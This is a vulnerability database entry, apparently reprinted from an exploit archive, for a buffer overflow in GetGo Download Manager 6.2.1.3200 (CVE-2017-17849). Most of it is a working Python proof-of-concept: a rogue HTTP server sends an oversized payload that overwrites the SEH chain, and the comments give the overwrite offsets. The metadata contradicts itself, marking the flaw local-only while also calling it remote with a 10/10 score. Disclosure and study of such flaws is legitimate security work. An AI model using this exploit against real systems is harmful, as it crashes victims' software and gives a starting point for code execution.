GetGo Download Manager 6.2.1.3200 Buffer Overflow (Denial of Service)

2018.07.25
Risk: Medium
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 10/10
Impact Subscore: 10/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

# Exploit Title: GetGo Download Manager 6.2.1.3200 - Buffer Overflow (Denial of Service) # Date: 2018-07-25 # Exploit Author: Nathu Nandwani # Website: http://nandtech.co # CVE: CVE-2017-17849 # Tested On: Windows 7 x86, Windows 10 x64 # # Details # # The downloader feature of GetGo Download Manager is vulnerable # to a buffer overflow which can cause a denial of service. # To test the proof of concept, have it executed in your machine # and let the GetGo application download 'index.html' from your # given IP. # # SEH details (Windows 7 x86): # # SEH chain of thread 00000644, item 1 # Address=0863E2C8 # SE handler=68463967 <-> 4108 offset # # SEH chain of thread 00000644, item 2 # Address=46386746 <-> 4104 offset # SE handler=*** CORRUPT ENTRY *** import socket server_ip = "0.0.0.0" server_port = 80 payload = "A" * 4104 + "BBBB" + "\xcc\xcc\xcc\xcc" + "D" * 11000 + "\r\n" sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.bind((server_ip, server_port)) sock.listen(1) print "Currently listening at " + server_ip + ":" + str(server_port) client, (client_host, client_port) = sock.accept() print "Client connected: " + client_host + ":" + str(client_port) print "" print client.recv(1000) client.send(payload) print "Sent payload" client.close() sock.close()


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top